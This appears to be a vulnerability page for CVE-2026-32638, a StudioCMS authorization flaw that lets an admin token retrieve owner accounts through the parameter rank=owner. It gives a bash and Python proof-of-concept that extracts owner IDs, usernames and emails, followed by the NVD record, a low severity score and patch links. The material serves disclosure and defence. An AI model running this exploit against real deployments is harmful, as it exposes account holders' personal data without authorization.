CVE-2026-32638

#!/bin/bash # CVE-2026-32638 PoC - StudioCMS getUsers Authorization Bypass # This script demonstrates how an admin token can bypass authorization to access owner accounts TARGET_URL="http://target-server/api" ADMIN_TOKEN="your_admin_token_here" echo "[*] Testing CVE-2026-32638: StudioCMS getUsers Authorization Bypass" echo "[*] Target: $TARGET_URL" # Step 1: Normal admin request (should not see owner accounts) echo "\n[+] Step 1: Normal getUsers request (admin token)" curl -s -X GET "$TARGET_URL/getUsers" \ -H "Authorization: Bearer $ADMIN_TOKEN" \ -H "Content-Type: application/json" | jq . # Step 2: Bypass request with rank=owner parameter echo "\n[+] Step 2: Bypass request with rank=owner parameter" curl -s -X GET "$TARGET_URL/getUsers?rank=owner" \ -H "Authorization: Bearer $ADMIN_TOKEN" \ -H "Content-Type: application/json" | jq . # Step 3: Extract owner account information echo "\n[+] Extracted owner account information:" curl -s -X GET "$TARGET_URL/getUsers?rank=owner" \ -H "Authorization: Bearer $ADMIN_TOKEN" \ -H "Content-Type: application/json" | jq '.[] | {id, username, displayName, email}' echo "\n[!] If owner accounts are returned, the vulnerability is confirmed." echo "\n# Python PoC\nimport requests\n\ndef exploit_cve_2026_32638(target_url, admin_token):\n \"\"\"\n Exploit for CVE-2026-32638\n StudioCMS getUsers endpoint authorization bypass\n \"\"\"\n headers = {\n 'Authorization': f'Bearer {admin_token}',\n 'Content-Type': 'application/json'\n }\n \n # Normal request - should filter owner accounts\n normal_response = requests.get(f'{target_url}/getUsers', headers=headers)\n print(f'[-] Normal request status: {normal_response.status_code}')\n \n # Bypass request - using rank=owner parameter\n bypass_params = {'rank': 'owner'}\n bypass_response = requests.get(\n f'{target_url}/getUsers',\n params=bypass_params,\n headers=headers\n )\n print(f'[+] Bypass request status: {bypass_response.status_code}')\n \n if bypass_response.status_code == 200:\n owners = bypass_response.json()\n print(f'[+] Found {len(owners)} owner account(s):')\n for owner in owners:\n print(f' - ID: {owner.get("id")}')\n print(f' Username: {owner.get("username")}')\n print(f' Email: {owner.get("email")}')\n print(f' Display Name: {owner.get("displayName")}')\n \n return bypass_response.json()\n"

{"cve": {"id": "CVE-2026-32638", "sourceIdentifier": "[email protected]", "published": "2026-03-18T21:16:26.770", "lastModified": "2026-03-19T18:40:31.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "StudioCMS is a server-side-rendered, Astro native, headless content management system. Prior to 0.4.4, the REST API `getUsers` endpoint in StudioCMS uses the attacker-controlled `rank` query parameter to decide whether owner accounts should be filtered from the result set. As a result, an admin token can request `rank=owner` and receive owner account records, including IDs, usernames, display names, and email addresses, even though the adjacent `getUser` endpoint correctly blocks admins from viewing owner users. This is an authorization inconsistency inside the same user-management surface. Version 0.4.4 fixes the issue."}, {"lang": "es", "value": "StudioCMS es un sistema de gestión de contenido sin cabeza, nativo de Astro y renderizado en el lado del servidor. Antes de la versión 0.4.4, el endpoint `getUsers` de la API REST en StudioCMS utiliza el parámetro de consulta `rank` controlado por el atacante para decidir si las cuentas de propietario deben filtrarse del conjunto de resultados. Como resultado, un token de administrador puede solicitar `rank=owner` y recibir registros de cuentas de propietario, incluyendo IDs, nombres de usuario, nombres para mostrar y direcciones de correo electrónico, a pesar de que el endpoint adyacente `getUser` bloquea correctamente a los administradores para que no vean a los usuarios propietarios. Esto es una inconsistencia de autorización dentro de la misma superficie de gestión de usuarios. La versión 0.4.4 soluciona el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:studiocms:studiocms:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.4.4", "matchCriteriaId": "EF77B4D2-70E1-4F62-AE18-5726017098A2"}]}]}], "references": [{"url": "https://github.com/withstudiocms/studiocms/commit/aebe8bcb3618bb07c6753e3f5c982c1fe6adea64", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/withstudiocms/studiocms/releases/tag/[email protected]", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/withstudiocms/studiocms/security/advisories/GHSA-xvf4-ch4q-2m24", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}